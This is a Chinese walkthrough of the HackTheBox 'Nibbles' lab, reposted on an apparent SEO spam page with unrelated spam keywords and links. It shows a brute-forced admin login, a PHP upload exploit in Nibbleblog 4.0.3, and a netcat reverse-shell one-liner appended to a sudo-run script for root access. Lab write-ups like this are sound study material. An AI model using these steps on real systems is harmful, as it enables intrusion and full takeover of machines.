当前位置: 首页 > news >正文

做英文色情网站犯法吗电商网络推广怎么做

做英文色情网站犯法吗,电商网络推广怎么做,测试工程师,印象笔记到wordpressNibbles 测试过程 1 信息收集 NMAP 80 端口 网站出了打印出“Hello world!”外,无其他可利用信息,但是查看网页源代码时,发现存在一个 /nibbleblog 文件夹 检查了 http://10.129.140.63/nibbleblog/ ,发现了 /index.p…

Nibbles 测试过程

1 信息收集


NMAP

在这里插入图片描述

80 端口

在这里插入图片描述

  网站出了打印出“Hello world!”外,无其他可利用信息,但是查看网页源代码时,发现存在一个 /nibbleblog 文件夹

在这里插入图片描述

  检查了 http://10.129.140.63/nibbleblog/ ,发现了 /index.php、/feed.php,没有其他可利用的信息

在这里插入图片描述

目录扫描

在这里插入图片描述

1. /content 目录

在这里插入图片描述

在这里插入图片描述

2. /admin.php 目录

在这里插入图片描述

  用户名:admin,爆破密码:nibbles,登录后页面如下

在这里插入图片描述

3. /README 目录

  发现Nibbleblog CMS 的版本号为:4.0.3

在这里插入图片描述


2 Nibbleblog 漏洞利用


在这里插入图片描述

Nibbleblog 4.0.3 代码执行漏洞原理

  当通过 My image 插件上传图片文件时,NibbleBlog 4.0.3 会保留上传文件的原始扩展名。不会检查此扩展名或实际文件类型,因此可以上传 PHP 文件并获得代码执行。

手工验证

在这里插入图片描述

  上传文件路径为:http://10.129.140.63/nibbleblog/content/private/plugins/my_image/image.php,访问 image.php,并忽略报错。ncat 监听到一个shell。

在这里插入图片描述

在这里插入图片描述

PTY Shell

在这里插入图片描述
在这里插入图片描述


3 权限提升


SUDO 提权

sudo -l

在这里插入图片描述

  检查 :/home/nibbler/personal/stuff/monitor.sh 文件

nibbler@Nibbles:/home/nibbler$ ls -ll 
ls -ll 
total 8
-r-------- 1 nibbler nibbler 1855 Dec 10  2017 personal.zip
-r-------- 1 nibbler nibbler   33 May 30 01:40 user.txtnibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive:  personal.zipcreating: personal/creating: personal/stuff/inflating: personal/stuff/monitor.sh  nibbler@Nibbles:/home/nibbler$ cd personal/stuff
cd personal/stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -ll
ls -ll
total 4
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh
cat monitor.sh#####################################################################################################                                        Tecmint_monitor.sh                                        ## Written for Tecmint.com for the post www.tecmint.com/linux-server-health-monitoring-script/      ## If any bug, report us in the link below                                                          ## Free to use/edit/distribute the code below by                                                    ## giving proper credit to Tecmint.com and Author                                                   ##                                                                                                  #####################################################################################################

  文件可写,可以将shell文件写入monitor.sh文件中

nibbler@Nibbles:/home/nibbler/personal/stuff$
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 4444 > /tmp/f" >> monitor.shnibbler@Nibbles:/home/nibbler/personal/stuff$ 
sudo /home/nibbler/personal/stuff/monitor.sh

在这里插入图片描述

在这里插入图片描述

http://www.mmbaike.com/news/91330.html

相关文章:

  • 此网站在美国进行维护网店运营工资一般多少
  • wordpress主题不见了整站seo排名
  • 深圳公司网站建设公司百度seo优化排名
  • 天津做公司网站最新网站发布
  • 一级做爰片a视频网站偷拍手机优化
  • 开源手机网站系统网站运营课程
  • 中山电子商务网站建设网购平台推广方案
  • 浙江疫情最新消息情况网站seo推广优化教程
  • 南山公安分局网站如何创建网站?
  • 网站开发与支付宝端口连接软文是什么意思?
  • 响应式网站做优化好吗seowhy
  • 绵阳市网站建立线上营销推广方案有哪些
  • 免费课程网站有哪些微信seo排名优化软件
  • 穷游网站 做行程 封面网络运营培训
  • 网站建设宝安全案网络推广公司
  • 福建省人民政府驻上海办事处企业seo整站优化方案
  • 网站风格发展趋势网络营销的特点有哪些特点
  • 建设银行网站地址郑州优化网站关键词
  • 常德市网站建设免费网站大全
  • 网站友情链接对方网站没有加入本站链接对本站有没有影响?自己的网站怎么推广
  • 网站建设流程与步骤东莞网站推广营销网站设计
  • 做科技汽车的视频网站有哪些推广seo优化公司
  • 视频网站备案怎么做湖北seo推广
  • 深圳网站建设ucreatorseo基础入门
  • 网页小游戏点击即玩网络营销seo优化
  • 投资网站建设十八大禁用黄app入口
  • 邓州网站设计免费的编程自学网站
  • 做网站是什么专业什么工作seo实战密码第三版pdf
  • 移动端网站案例怎样看网页的友情链接
  • WordPress css隐藏熊掌号seo外链代发